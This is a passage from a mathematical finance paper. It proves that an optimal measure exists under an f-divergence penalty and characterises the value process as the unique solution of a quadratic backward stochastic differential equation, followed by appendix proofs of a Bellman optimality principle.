h(\eta_s)\textbf{1}_{\{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}>0\}}ds] +(1-\lambda) \E_{Q^{\eta'}}[\dint_0^TS_s^\delta h(\eta'_s)\textbf{1}_{\{\lambda L_s^\eta+(1-\lambda)L_s^{\eta'}>0\}}ds\Big]. \end{split}$$ Since we have $\E_Q[\Uc_{0, T}] = \lambda \E_ {Q^\eta} [\Uc_{0, T}]+ (1-\lambda) \E_{Q^{\eta'}} [\Uc_{0, T}], $ we deduce that $$\Gamma (Q) \leq \lambda \Gamma (Q^\eta) + (1-\lambda) \Gamma (Q^{\eta'}).$$ The following theorem states the existence of a probability measure solution of the optimization problem (\[min\]). \[exisun\] Assume that **(A1)-(A’2)** are satisfied. Then there is a probability measure $Q^{\eta^*}\in\Qc_f^c$ minimizing $ Q^\eta \mapsto\Gamma(Q^\eta) $ over all $ Q^\eta \in \Qc_f^c.$ 1. Let $(Q^{\eta^n})_{n \in \N}$ be a minimizing sequence of $\Qc_f^c$ ie: $$\searrow\lim\limits_{n \to +\infty} \Gamma (Q^{\eta^n}) = \inf \limits_{Q^\eta\in\Qc^c_f} \Gamma(Q^\eta).$$ We denote by $ Z^n:=Z^{Q^{\eta^n}} = \Ec(\int\eta_ndW) $ the corresponding density processes.\ Since each $ Z_T^n \geq 0 $, it follows from Koml$\acute {\textrm{o}}$s’ lemma that there is a sequence $ (\bar{Z}_T ^ n) _ {n \in \N} $ such that $ \bar{Z}_T^n \in conv(Z^n_T, Z ^ {n+1} _T, ...)$ for all $ n \in \N $ and $ (\bar{Z}^n_t) $ converges $P$-a.s to a random variable $\bar{Z}^{\infty}_T $.\ $ \bar{Z}^{\infty}_T $ is positive but may be infinite. As $ \Qc_f$ is convex, each $\bar {Z}_T^n$ is associated with a probability measure $ \bar{Q}^n \in \Qc_f.$ This also holds for $ \bar {Z}^{\infty}_T $ i.e. that $ d\bar{Q}^{\infty}:=\bar{Z}^{\infty}dP $ defines a probability measure $ \bar{Q}^{\infty} \in \Qc_f.$ Indeed, we have first: $$\label{ineq13} \Gamma (\bar{Q}^n) \leq \sup \limits_{m\geq n} \Gamma (Q^{\eta^m}) = \Gamma(Q^{\eta^n}) \leq \Gamma (Q^{\eta^1}),$$ where the first inequality holds since $Q^\eta\mapsto \Gamma(Q^\eta)$ is convex and $ n \mapsto \Gamma(Q^{\eta^n}) $ is decreasing, and the second inequality follows from the monotonicity property of $(\Gamma(Q^{\eta^n}))_n$. Therefore Corollary $(\ref{controlentropy})$ gives $$\label{c2} \sup\limits_{n \in \N} \E_P [\bar{Z}^n\ln(\bar{Z}^n)] = \sup\limits_{n\in\N} H(Q^n|P) \leq K'(1+\sup \limits_{n\in\N}\Gamma (\bar{Q}^n)) \leq K'(1+ \Gamma (Q^{\eta^1})).$$ Thus $ (\bar{Z}^n_T)_{n\in\N} $ is $ P $-uniformly integrable by Vallée-Poussin’s criterion and converges in $ L^1(P)$. This implies that $\E_P[\bar{Z}^{\infty}_T]=\lim \limits_{n \rightarrow +\infty} E_P[\bar{Z}^n_T] = 1 $ so that $ Q^{\infty} $ be a probability measure and $ Q^{\infty} \ll P$ on $\Fc_T.$ We define $Z_t^\infty:=E_P[Z_T^\infty|\Fc_t]$. $(Z_t^\infty)_t$ is a martingale. From the representation given by (\[representation\]) there is an adapted process $(\eta_t^\infty)_t$ valued in $\R^d$ satisfying $\int_0^T\Vert\eta_t^\infty\Vert^2 dt <+\infty\;\; P.a.s$ and $Z_t^\infty=\Ec(\int_0^t \eta_s^\infty dW_s).$ 2. We now want to show that $\bar{Q}^\infty \in \Qc_f^c.$ Let $ \bar{Z}^\infty $ be the density process of $ \bar{Q}^\infty$ with respect to $P$. Since we know that $ (\bar{Z}^n_T) $ converges to $ \bar{Z}^\infty $ in $ L^1(P),$ the maximal Doob’s inequality $$P[\sup\limits_{0\leq t \leq T} \mid \bar{Z}^\infty_t-\bar{Z}^n_t \mid\geq \epsilon]\leq \frac{1}{\epsilon} \E_P[\mid \bar{Z}^\infty_T-\bar{Z}^n_T \mid]$$ implies that $(\sup\limits_{0\leq t \leq T} \mid \bar{Z}^\infty_t-\bar{Z}^n_t \mid)_{n\in\N}$ converges to $0$ in $P$-probability. Going to a subsequence, still denoted by $(\bar{Z}^n)_{n\in \N}$, we can assume that $(\sup\limits_{0\leq t \leq T} \mid \bar{Z}^\infty_t-\bar{Z}^n_t \mid)_{n\in\N}$ converges to $0$ $P$-a.s. By Burkholder-Davis-Gundy’s inequality there is a constant $C$ such that $$E[\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T^\frac{1}{2}]\leq C E[\sup\limits_{0\leq t \leq T} \mid \bar{Z}^\infty_t-\bar{Z}^n_t \mid].$$\ Let $M_t^n:=\sup\limits_{0\leq s \leq t} \mid \bar{Z}^\infty_s-\bar{Z}^n_s \mid $ and $(\tau_n)$ a sequence of stopping time defined by $$\tau_n=\left\{\begin{array}{ccc} \inf\{t\in [0,T[; M^n_t\geq 1\} & \textrm{if} & \{t\in [0,T[; M^n_t \geq 1\}\neq \emptyset \\ T & & \textrm{otherwise} \end{array}\right..$$ Since $M_{\tau_n}^n$ is bounded by $M_T^n \wedge 1$ then $M_{\tau_n}^n$ converges almost surely to $0$ and by the dominated convergence theorem converges to $0$ in $L^1(P).$ Then, using Burkholder-Davis-Gundy’s inequality $\langle \bar{Z}^\infty-\bar{Z}^n \rangle_{\tau_n}^\frac{1}{2}$ converges to $0$ in $L^1(P)$ and a fortiori in probability.\ As $\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T= \langle \bar{Z}^\infty-\bar{Z}^n \rangle_{\tau_n}\textbf{1}_{\{\tau_n=T\}}+\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T\textbf{1}_{\{\tau_n<T\}}$, then for all $\varepsilon>0,$ $$\begin{split} P(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T\geq \varepsilon) & \leq P(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_{\tau_n}\textbf{1}_{\{\tau_n=T\}}\geq \varepsilon)+ P(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T\textbf{1}_{\{\tau_n<T\}}\geq \varepsilon) \\ & \leq P(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_{\tau_n}\geq \varepsilon)+P(\tau_n<T) \end{split}$$ From the convergence in probability of $(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_{\tau_n})_n$, we have $\lim\limits_{n\rightarrow +\infty}P(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_{\tau_n}\geq \varepsilon)=0.$ Since $M^n$ is an increasing process, we have $$P(\tau_n<T)=P(\{\exists t\in[0,T[\;\; s.t\;\; M^n_t\geq 1\})=P(\{ M^n_T\geq 1\}).$$ Since $M_T^n$ converges in probability to $0$, we have $P(\{ M^n_T\geq 1\}) \underset{n\rightarrow +\infty}{\longrightarrow} 0$. Then $\lim\limits_{n\rightarrow +\infty}P(\tau_n<T)=0,$ and consequently $\lim\limits_{n\rightarrow +\infty}P(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T\geq \varepsilon)=0$ .ie $(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T)_n $ converges in probability to $0.$ We can extract a subsequence also denoted by $\bar{Z}^n$ such that $(\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T)_n $ converges almost surely to $0.$\ On the other hand we have $$\langle \bar{Z}^\infty-\bar{Z}^n \rangle_T=\dint_0^T(\bar{Z}_u^\infty\bar{\eta}_u^\infty-\bar{Z}^n_u\bar{\eta}^n_u)^2du .$$ It follows that processes $\bar{Z}^n\bar{\eta}^n$ converge in $dt\otimes dP$-measure to process $\bar{Z}^\infty\bar{\eta}^\infty.$ Since $\bar{Z}^n\longrightarrow \bar{Z}^\infty dt\otimes dP$-a.e, we have $\bar{\eta}^n$ converges in $dt\otimes dP$-measure to $\bar{\eta}^\infty.$ Fatou’s lemma and inequality (\[c2\]) gives: $$\label{c3} \gamma_0(\bar{Q}^\infty) = \mathbb{E}_P [ \bar{Z}^\infty_T\int_0^T h(\bar{\eta}_u^\infty)du] \leq \liminf\limits_{n\rightarrow +\infty} \E_\mathbb{P} [Z^n_T\int_0^T h(\eta_u^n) du] < +\infty.$$ This shows that $\bar {Q}^{\infty} \in \Qc_f.$\ Now we will show that the probability $\bar {Q}^{\infty}$ is optimal.\ For $n\in\N \cup \{+\infty\}$, let $\bar{Y}_1^n:=\bar {Z}^n_T \Uc^\delta$ and $ \bar{Y}_2^n:=\beta \Rc^\delta(\bar{Q}^n))$ then $\lim\limits_{ n\rightarrow +\infty} \bar{Y}^n_i = \bar{Y}^\infty_i \;P-$a.s for $i = 1,2.$ As $\bar{Y}^n_2 $ is bounded from below, uniformly in $n$ and $\omega$, Fatou’s lemma yields: $$\label{c4} \E_\mathbb{P}[\bar{Y}^\infty_2]\leq \liminf\limits_{n\rightarrow \infty}\E_\mathbb{P}[\bar{Y}^n_2].$$ By adopting the same approach as in Theorem \[exisun\] we show that: $$\label{c5} \E_\mathbb{P}[\bar{Y}^\infty_1]\leq \liminf\limits_{n\rightarrow \infty}\E_\mathbb{P}[\bar{Y}^n_1].$$ Inequality(\[c4\]), (\[c5\]) and (\[c2\]) provide that: $$\Gamma(\bar{Q}^\infty) =\E_\mathbb{P} [ \bar{Y}^\infty_1+\bar{Y}^\infty_2 ] \leq \liminf\limits_{n\rightarrow \infty}\Gamma(\bar{Q}^n) \leq \liminf\limits_{n\rightarrow \infty}\Gamma(Q^n)\leq \inf\limits_{Q\in \Qc_f}\Gamma(Q).$$ This proves that $\bar{Q}^\infty $ is indeed optimal. BSDE description for the dynamic value process ---------------------------------------------- In this section, stochastic control techniques are employed to study the dynamics of the value process denoted by $V$ associated with the optimization problem (\[min\]). It is proved that $V$ is the only single solution of a quadratic backward stochastic differential equation. This extends the work of Skiadas [@SK03], Schroder and Skiadas [@SS03].\ We first introduce some notations that we use below. Denote by $\Sc$ the set of all $\Fc$ stopping time $\tau $ with values in $ [0,T] $, $\Dc^c $ the space of all processes $\eta $ with $ Q^\eta \in \Qc_f^c$ and $\Dc^{c,e} $ the space of all processes $\eta $ with $ Q^\eta \in \Qc_f^{c,e}$. We define: $$\mathcal{D}^c(\eta, \tau): = \{\eta '\in \Dc^c, Q^\eta = Q^{\eta'} \, \textrm {on} \, [0,\tau] \}$$ $$\Gamma (\tau,Q^\eta):= \mathbb{E}_{Q^{\eta}} [c (.,Q^\eta)| \Fc_\tau].$$ We note that $\Gamma (0,Q^\eta)$ and $\Gamma (Q^\eta)$ coincide. The minimal conditional cost at time $\tau$ is defined by $$J(\tau,Q^\eta): = Q^\eta-\underset{\eta'\in \Dc^c(\eta,\tau)}{\essinf} \Gamma (\tau,Q^{\eta'}).$$ Then the problem (\[min\]) can be written as follows: $$\textrm{give} \inf\limits_{Q^\eta\in\Qc_f^c}\Gamma(Q^\eta)=\inf \limits_{Q^\eta\in\Qc_f^c}\E_{Q^\eta}[c(.,Q^\eta)]= \E_P[J(0,Q^\eta)].$$ Where the second equality is deduced since the dynamic programming principle holds and we have $Q^\eta=P$ on $\Fc_0$ for all $Q^\eta \in\Qc_f^c.$\ The following martingale optimality principle is a direct consequence of Theorems 1.15, 1.17 and 1.21 in El Karoui[@ELK81]. For the sake of completeness, the proof is given in the Appendix. \[martingaleoptimality\] - The family $ \{J (\tau,Q^\eta) | \tau \in \mathcal{S}, Q^\eta \in Q_f^c\} $ is a submartingale system. - $ Q^{\eta^*} \in \Qc_f^c$ is optimal $\Leftrightarrow $ $ \{J (\tau, Q^{\eta^*}) | \tau \in \Sc \}$ is a martingale system . - For any $Q^{\eta} \in \Qc_f^c$ there is an RCLL adapted process $(J^\eta_t)_{0 \leq t \leq T}$ which is a $Q^\eta$- martingale $J_{\tau}^\eta = J(\tau,Q^\eta)$. In order to characterize the value process in terms of BSDE we need the following proposition. \[infQeq\] Under **(A1)-(A’2)**, we have $$\inf\limits_{Q^\eta\in \Qc_f^c}\Gamma(Q^\eta)=\inf\limits_{Q^\eta\in \Qc_f^{c,e}}\Gamma(Q^\eta).$$ Let $Q^{\eta^*} \in \Qc_f^c$ such that $\inf\limits_{Q^\eta\in \Qc_f^c}\E_Q[c(.,Q)]=\E_{Q^{\eta^*}}[c(.,Q^{\eta^*})]$ and $\lambda \in [0,1)$, then $\lambda Q^{\eta^*} +(1-\lambda) P \in \Qc_f^{c,e}.$ Since $Q^\eta\mapsto \Gamma(Q^\eta)$ is convex then $$\Gamma(\lambda Q^{\eta^*} +(1-\lambda) P)\leq \lambda\Gamma( Q^{\eta^*}) +(1-\lambda) \Gamma(P) \;\; \forall \lambda \in [0,1),$$ which implies $$\limsup\limits_{\lambda\rightarrow 1}\Gamma(\lambda Q^{\eta^*} +(1-\lambda) P)\leq \Gamma( Q^{\eta^*}).$$ Consequently, we have $$\inf\limits_{Q^\eta\in \Qc_f^c}\Gamma(Q^\eta)\geq\inf\limits_{Q^\eta\in \Qc_f^{c,e}}\Gamma(Q^\eta).$$ The converse inequality holds since $\Qc_f^{c,e} \subset \Qc_f^c.$\ The following technical lemma is also needed. \[lingrowth\] let $f$ a convex increasing differentiable function such that $$\label{quadineg}|f(x)| \leq A_1 + B_1x^{2}\; \textrm{for all}\; x\in \mathbb{R}$$ for some constants $A_1$ et $B_1$, then there are two real constants $A_2$ et $B_2$ such that: $$0 \leq f'(x) \leq (A_2 + B_2 |x|).$$ Since $f$ is convex, we have $f(2x) \geq f(x) + (2x-x) f'(x). $\ Using inequality (\[quadineg\]), we obtain $xf'(x)-A_1-B_1x ^{2} \leq A_1 +4B_1x^{2} $ and so $$xf'(x) \leq 2A+5Bx^{2}\;\; \textrm{for all}\;\; x\in \mathbb{R}.$$ It was therefore for $x \geq 1 $ that $ f '(x) \displaystyle \leq \frac{2A_1}{x}+5 B_1x$ and consequently $ f '(x) \displaystyle \leq 2A_1+ 5 B_1x$.\ For $ x \leq 1 $, and since $f'$ is increasing, we obtain $ 0 \leq f'(x) \leq f'(1) = M_{1} $. This shows that $$0 \leq f'(x) \leq (2A_1+M_1 + 5B_1 |x|).$$ We later use a strong order relation on the set of increasing processes defined by Let $A$ and $B$ two increasing process. We say $A\preceq B$ if the process $B-A$ is increasing. We already know from Theorem \[exisun\] that there is an optimal model $Q^{\eta^*}\in\Qc_f^c$. For each $ Q^\eta \in \Qc^{c,e}_f $ and $ \tau \in \Sc $, we define the value of the control problem started at time $\tau$ $$V (\tau, Q^\eta)= Q^\eta-ess\inf\limits_ {{\eta'}\in \Dc(\eta,\tau)}\tilde{V} (\tau, Q^{\eta'}),$$ where $$\tilde{V}(\tau,Q^{\eta'}) = \E_{Q^{\eta'}} [\Uc^\delta_ {\tau,T} | \Fc_ \tau] + \beta \E_{Q^{\eta'}} [\Rc_{\tau, T}^\delta(Q^{\eta'}) | \Fc_ \tau].$$ We need to define the following space $$\Hc^p_d=\Big\{ (Z_t)_{0\leq t \leq T}\mathbb{F}\textrm{-progressively measurable process valued in}\;\; \R^d\;\; s.t \;\;\E_P[\int_0^T|Z_u|^pdu]<\infty\Big\}.$$ The following result characterizes value process $V$ as the unique solution of a BSDE with a quadratic generator and unbounded terminal condition. Precisely we have Under the assumptions **(A1)-(A’2)**, pair $(V,Z)$ is the unique solution in $D_0^{\exp}\times \Hc^p_{d}, p\geq 1, $ of the following BSDE: $$\label{bsde description} \left \{\begin{split} &dY_t = (\delta_tY_t-\alpha U_t+ h^*(\frac{1}{\beta}Z_t))dt - Z_tdW_t, \\ & Y_T = \alpha'U_T'. \end{split} \right.$$ and $Q^*$ is equivalent to $P.$ By using Bayes’ formula and the definition of $ \Rc_ {\tau,T}^\delta(Q^{\eta'})$, it is clear that $\tilde {V}(\tau,Q^{\eta'})$ depends only on the values of $ \eta'$ on $(\tau, T]$ and is therefore independent of $Q^\eta$ since $\eta=\eta'$ on $[0,\tau].$ Thus we can also take the ess$\inf$ under $P\approx Q $ . From Proposition \[infQeq\], we could take the infimum over the set $\Qc_f^{c,e},$ which implies $$V (\tau, Q^\eta)= P-\underset{{\eta'}\in \Dc^c(\eta,\tau)\cap \Dc^{c,e}}{\essinf}\tilde{V} (\tau, Q^{\eta'}),$$ for all $Q^\eta\in \Qc_f^{c,e}.$ Since $V(\tau,Q^\eta )$ is independent of $Q^\eta$, we can denote $V(\tau,Q^\eta )$ by $V(\tau).$\ We fix $\eta'\in \Dc(Q^\eta,\tau)$. From the definition of $\Rc_{t,T}^\delta (Q^{\eta'}) $ (see equation (\[penalty definition ctc\])), we have $$\begin{split} \Rc_{0, T}^\delta (Q ^{\eta'})& = \dint_0^T \delta_sS_s ^ \delta (\int_0^sh (\eta'_u)du)ds + S_T^\delta \int_0^T h(\eta'_u)du \\& = \dint_0^\tau \delta_sS_s^\delta(\int_0^sh(\eta_u)du)ds+S_\tau^\delta \int_0^\tau h(\eta_u)du + S_\tau^\delta \Rc_{\tau,T}^\delta(Q^{\eta'}). \end{split}$$ By comparing the definitions of $ V(\tau)=V(\tau, Q^\eta) $ and $J(\tau, Q^\eta),$ then we get for $ Q^\eta \in \Qc^{c,e}_f $ $$\label{jtau} J^\eta_\tau = S_\tau V_\tau + \alpha \int_0^\tau S_sU_sds + \beta \Big(\dint_0^\tau \delta_sS_s^\delta (\int_0 ^sh (\eta_u)du)ds + S_\tau^\delta \int_0^\tau h(\eta_u)du\Big).$$ Arguing as above, the ess$\inf$ for $ J(\tau, Q^\eta) $ could be taken under $ P \approx Q^\eta $. From the Proposition \[martingaleoptimality\], $J^\eta_\tau$ admits an RCLL version. From equality (\[jtau\]), an appropriate RCLL process $V=(V_t)_{0 \leq t \leq T }$ can be chosen such that $$V_\tau = V(\tau) = V(\tau,Q^\eta), \; \mathbb{P}.a.s \,\;\; \textrm{for all}\;\; \tau \in \Sc \, \, \textrm {and} \, \, Q^\eta \in \Qc_f^{c,e}$$ and then we have for all $ Q^\eta \in \Qc^{c,e}_f $ $$\label{jq} J_t^\eta=S_t^\delta V_t + \alpha \int_0^t S^\delta_sU_sds + \beta \Big(\dint_0^t \delta_sS_s^\delta (\int_0^sh (\eta_u) du) ds + S_t^\delta \int_0^t h(\eta_s) ds \Big)\;\; dt\otimes dP\; \textrm{a.e},\; 0\leq t\leq T.$$ From Remark \[rem2\] $P$ belongs to $\Qc_f^{c,e}$. If we take $\eta\equiv 0, $ the probability measure $Q^0$ coincides with the historical probability measure $P.$ Then, by the Proposition \[martingaleoptimality\], $J^P $ is $ P$- submartingale. From equation (\[jtau\]), $ J^0=S^\delta V+\alpha \int S^\delta_sU_sds $ and thus, by It$\hat{\textrm{o}}$’s lemma, it can be deduced that $V$ is a $P$-special semimartingale. Its canonical decomposition can be written as follows: $$\label{canonicdecomp} V_t= V_0 - \int_0^t q_sdW_s + \int_0^t K_sds .$$ For each $ Q^\eta \in \Qc^{c,e}_f$, we have $Z_.^\eta=\Ec(\int_0^. \eta dW). $ Plugging (\[canonicdecomp\]) in to (\[jtau\]), we obtain $$dJ^\eta_t = S^\delta_t (-q_tdW_t+K_tdt) - \delta_tS_tV_tdt + \alpha S_tU_tdt + \beta S_t^\delta h(\eta_t) dt.$$\ By Girsanov’s theorem the process $-\int_0 ^. q_tdW_t+\int_0 ^.q_t \eta_tdt $ is a local martingale under $Q^\eta$ and the dynamic of $(J^\eta_t)_t$ is given by $$dJ^\eta_t = S^\delta_t (-q_tdW_t+q_t \eta_tdt) + S^\delta_t (K_t- q_t\eta_t + \beta h (\eta_t)) dt-\delta_tS^\delta_tV_tdt + \alpha S^\delta_tU_tdt.$$ $J^\eta $ is a $Q^\eta-$ submartingale and $J^{\eta^*}$ is $ Q^{\eta^*}$- martingale. Such properties hold if we choose $K_t= \delta V_t-\alpha U_t - \mbox{ess}\inf\limits_{\eta}(-q_t\eta_t+\beta h(\eta_t)),$ where the essential infimum is taken in the sense of strong order $\preceq .$ Then $$\label{processK} K_t= \delta V_t-\alpha U_t + \mbox{ess}\sup\limits_{\eta}(q_t\eta_t-\beta h(\eta_t))= \delta V_t-\alpha U_t + \beta h^*(\frac{1}{\beta}q_t).$$\ This ess $\inf$ is reached for $\eta^*= (h')^{-1}(\frac{1}{\beta}q_t).$ From (\[canonicdecomp\]) and (\[processK\]) we deduce that $$\left\{ \begin{split} & dV_t=(\delta_tV_t-\alpha U_t +\beta h^*(\frac{1}{\beta}q_t))dt - q_tdW_t \\ & V_T=\alpha'U'_T. \end{split} \right.$$ Moreover we have, $(h^*)'(q_t)=\eta^*_t \;\;dt \otimes dP$ a.s . From Lemma \[lingrowth\], there is a positive constant $c$ such that $|(h^*)'(x)|\leq c(|x|+1).$ Then, we have $$\int_0^T|\eta^*_t|^2dt=\int_0^T|(h^*)'(q_t)|^2dt\leq c^2\int_0^T(1+|q_t|)^2dt<+\infty,$$ which means $P\{\frac{dQ^{\eta^*}}{dP}=0\}=P\{\int_0^T|\eta^*_t|^2dt=\infty\}=0$. Hence $Q^{\eta^*}\sim P.$ According to Briand and Hu [@BH07] the equation (\[bsde description\]) has a unique solution, because inequality $$h(x)\geq \kappa_1|x|^2-\kappa_2$$ implies $$h^*(x)\leq \frac{1}{2\kappa_1}|x|^2+\kappa_2$$ and hence the driver $f$ of BSDE (\[bsde description\]) given by $f(t,w,y,z)=\delta_ty-\alpha U_t +\beta h^*(\frac{1}{\beta}z)$ satisfies: 1. for all $t\in [0,T]$, for all $y\in \R,$ $z\mapsto f(t,y,z)$ is convex; 2. for all $(t,z)\in[0,T]\times \R^d$, $$\forall (y,y')\in \R^2; |f(t,y,z)-f(t,y',z)|\leq \parallel \delta\parallel_\infty|y-y'|.$$ 3. for all $(t,y,z)\in[0,T]\times\R \times \R^d$, $$\begin{split} |f(t,y,z)|&=|\delta_ty-\alpha U_t +\beta h^*(\frac{1}{\beta}z)| \leq\parallel\delta\parallel_\infty |y|+|\alpha| |U_t|+\frac{1}{2\kappa_1\beta}|z|^2+\kappa_2. \end{split}$$ Since the process $|\alpha U_t|\in D_1^{\exp}$ and the terminal condition $\bar{\alpha}\bar{U}_T\in L^{\exp}$, the existence of the BSDE solution is ensured. Uniqueness comes from the convexity of $h^*.$ A comparison with related results --------------------------------- In the case of the entropic penalty, which corresponds to $h(x)=\frac{1}{2}|x|^2,$ the value process is described through the backward stochastic differential equation: $$\label{bsde description entropic case} \left \{\begin{split} dY_t & = (\delta_tY_t-\alpha U_t+ \frac{1}{2\beta}|Z|^2_t)dt - Z_tdW_t \\ & Y_T = \alpha'U_T' \end{split} \right..$$ These results are obtained by Schroder and Skiadas in [@SK03; @SS03] where $\alpha'=0.$ In the context of a dynamic concave utility, Delbaen, Hu and Bao [@Delb09] treated the case $\delta=0$ and $\xi=\alpha'U'$ is bounded and $\beta=1$. In this special case the existence of an optimal probability is a direct consequence of Dunford-Pettis’ theorem and James’ theorem shown in Jouini-Schachermayer-Touzi’s work [@JST05]. Delbaen et al. showed that the dynamic concave utility $$Y_t= ess\inf\limits_{Q\in \Qc_f}E[\xi+\int_t^Th(\eta_u)du|\mathcal{F}_t]$$ satisfies the following BSDE: $$\left \{\begin{split} &dY_t = h^*(Z_t)dt - Z_tdW_t \\ & Y_T = \xi. \end{split} \right.$$ $\hfill \Box $ Appendix ======== Proof of the Bellman optimal principle -------------------------------------- ### f-divergence case \[lemma3\] For all $\tau \in \Sc$ and all $Q\in \Qc_f$, the random variable $J(\tau ,Q)$ belongs to $L^1(Q)$ By definition $$J(\tau ,Q)\leq \Gamma(\tau ,Q) \leq \E_Q[|c(.,Q)|| \Fc_\tau],$$ and consequently $$(J(\tau ,Q))^+ \leq \E_Q[|c(.,Q)|| \Fc_\tau]$$ is $Q-$ integrable according to Proposition \[prop1\].\ Let us show that $(J(\tau ,Q))^-$ is $Q-$ integrable. We fix $Z^{Q'} \in \Dc(Q,\tau).$ In inequality (\[ineq7\]), choosing $\gamma > 0$ such that $\beta \displaystyle e^{(-T \Vert\delta \Vert _{\infty})}-\frac{1}{\gamma} =0$, then we obtain $$\begin{split} \Gamma(\tau,Q')&\geq -B:=-\beta \kappa \frac{1}{Z_\tau^Q}(T \parallel \delta \parallel_\infty+1) -\frac{1}{Z_\tau^Q}\Big[\frac{1}{\gamma}\E_P[f^*(\gamma \alpha \int_{0}^{T}|U(s)|ds+\gamma \bar{\alpha} |\bar{U}_T| )|\Fc_\tau]\Big]. \end{split}$$ Since the random variable $B$ is nonnegative and does not depend on $Q'$, we conclude that $J(\tau,Q)\geq -B.$ Since $f^*(x)\geq 0 $ for all $x\geq 0$, we have $$\begin{split} J(\tau,Q)^-\leq B:= \beta \kappa \frac{1}{Z_\tau^Q}(T \parallel \delta \parallel_\infty+1) +\frac{1}{Z_\tau^Q}\Big[\frac{1}{\gamma}\E_P[f^*(\gamma \alpha \int_{0}^{T}|U(s)|ds+\gamma \alpha' |U^{\prime }_T| )|\Fc_\tau]\Big]. \end{split}$$ Finally, $B\in L^1(Q)$ because the assumption **(A1)-(A2)**. Space $\Dc$ is compatible and stable under bifurcation and cost functional $c$ is coherent. 1-We first prove that $\Dc$ is compatible\ Take $Z^Q\in \Dc, \tau \in \Sc$ and $Z^{Q'}\in \Dc(Q,\tau)$. Then, from definition of $\Dc(Q,\tau)$ we have $Q|_{\Fc_\tau}=Q'|_{\Fc_\tau}$\ 2- Take $Z^Q\in \Dc,\tau \in \Sc , A\in \Fc_\tau$ and $Z^{Q'}\in \Dc(Q,\tau)$ again. The fact that $Z^Q|\tau_A|Z^{Q'}:=Z^{Q'}\mathbf{1}_A+Z^Q\mathbf{1}_{A^c}$ is still in $\Dc$ must be checked.\ To this end, it is enough to show that $Z^Q|\tau_A|Z^{Q'}$ is a $\Fc$-martingale and that $(Z^Q|\tau_A|Z^{Q'})_T$ defines a probability measure in $\Qc_f$.\ Let us start proving that $Z^Q|\tau_A|Z^{Q'}$ is a martingale. Since our time horizon $T$ is finite, we have to prove that $$\E_P[(Z^Q|\tau_A|Z^{Q'})_T|\Fc_t]=(Z^Q|\tau_A|Z^{Q'})_t .$$ Observing that $\mathbf{1}_{\{\tau\leq t\}}+\mathbf{1}_{\{\tau > t\}}\equiv 1$, we have $$\begin{split} \E_P[(Z^Q|\tau_A|Z^{Q'})_T|\Fc_t]&= \E_P[Z_T^{Q'}I_A+Z_T^Q\mathbf{1}_{A^c}(\mathbf{1}_{\{\tau\leq t\}}+\mathbf{1}_{\{\tau > t\}})|\Fc_t] \\&=\E_P[Z_T^{Q'}\mathbf{1}_{A\cap \{\tau\leq t\}}|\Fc_t]+\E_P[Z_T^{Q'}\mathbf{1}_{A\cap \{\tau > t\}}|\Fc_t] \\&+\E_P[Z_T^{Q}\mathbf{1}_{A\cap \{\tau\leq t\}}|\Fc_t]+\E_P[Z_T^{Q}\mathbf{1}_{A\cap \{\tau > t\}}|\Fc_t]. \end{split}$$ Since $A\cap \{\tau\leq t\}$ and $A^c\cap \{\tau\leq t\}$ are in $\Fc_t$, while $A\cap \{\tau > t\}$ and $A^c\cap \{\tau > t\}$ are in $\Fc_\tau$ , we have $$\begin{split} &\E_P[(Z^Q|\tau_A|Z^{Q'})_T|\Fc_t] \\&=I_{A\cap \{\tau\leq t\}}\E_P[Z_T^{Q'}|\Fc_t]+\E_P[\E_P[Z_T^{Q'}\mathbf{1}_{A\cap \{\tau > t\}}|\Fc_{\tau \vee t}]|\Fc_t] \\&+\mathbf{1}_{A^c\cap \{\tau\leq t\}}\E_P[Z_T^{Q}|\Fc_t]+\E_P[\E_P[Z_T^{Q}\mathbf{1}_{A^c\cap \{\tau > t\}}|\Fc_{\tau \vee t}]|\Fc_t] \\&=\mathbf{1}_{A\cap \{\tau\leq t\}}Z_t^{Q'}+P[Z_{\tau \vee t}^{Q'}\mathbf{1}_{A\cap \{\tau > t\}}|\Fc_t] + \mathbf{1}_{A^c\cap \{\tau\leq t\}}Z_t^{Q}+P[Z_{\tau \vee t}^{Q}\mathbf{1}_{A^c\cap \{\tau > t\}}|\Fc_t] \\&=\mathbf{1}_{A\cap \{\tau\leq t\}}Z_t^{Q'}+\E_P[Z_\tau ^{Q'}\mathbf{1}_{A\cap \{\tau > t\}}|\Fc_t] + \mathbf{1}_{A^c\cap \{\tau\leq t\}}Z_t^{Q}+\E_P[Z_\tau^{Q}\mathbf{1}_{A^c\cap \{\tau > t\}}|\Fc_t]. \end{split}$$ From the definition of $\Dc(Q,\tau)$, we have $Z_\tau^{Q'}=Z_\tau^Q$ and so $$\begin{split} &\E_P[(Z^Q|\tau_A|Z^{Q'})_T|\Fc_t] \\&=\mathbf{1}_{A\cap \{\tau\leq t\}}Z_t^{Q'}+\E_P[Z_\tau ^{Q}\mathbf{1}_{A\cap \{\tau > t\}}|\Fc_t] + \mathbf{1}_{A^c\cap \{\tau\leq t\}}Z_t^{Q}+\E_P[Z_\tau^{Q}I_{A^c\cap \{\tau > t\}}|\Fc_t] \\&=\mathbf{1}_{A\cap \{\tau\leq t\}}Z_t^{Q'}+\E_P[Z_\tau ^{Q}\mathbf{1}_{\{\tau > t\}}|\Fc_t]+ \mathbf{1}_{A^c\cap \{\tau\leq t\}}Z_t^{Q} \\&=\mathbf{1}_{A\cap \{\tau\leq t\}}Z_t^{Q'}+Z_t ^{Q}\mathbf{1}_{\{\tau > t\}}+ \mathbf{1}_{A^c\cap \{\tau\leq t\}}Z_t^{Q} \\&=\mathbf{1}_{A\cap \{\tau\leq t\}}Z_t^{Q'}+Z_t ^{Q}(\mathbf{1}_{\{\tau > t\}\cap A}+\mathbf{1}_{\{\tau > t\}\cap A^c})+ \mathbf{1}_{A^c\cap \{\tau\leq t\}}Z_t^{Q} \\&=\mathbf{1}_{A\cap \{\tau\leq 